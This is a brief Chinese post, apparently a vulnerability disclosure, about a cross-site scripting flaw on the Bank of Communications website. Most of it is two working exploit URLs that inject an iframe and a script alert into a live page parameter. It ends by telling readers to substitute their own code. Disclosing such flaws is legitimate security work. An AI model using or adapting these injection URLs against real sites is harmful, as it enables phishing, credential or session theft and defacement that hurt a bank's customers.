交通银行网页存在跨站漏洞

交通银行网页存在跨站漏洞

  交通银行网页存在跨站漏洞，可以在页面中挂iframe，英文版和繁体版均存在此问题，以下是测试过程：

提交：

http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://www.315safe.com></iframe>

点击这里测试

提交：

http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<script>alert("315SAFE安全检测")</script>

点击这里测试

其他的不演示了

把上面URL中“业务推荐”后的代码换成你的即可。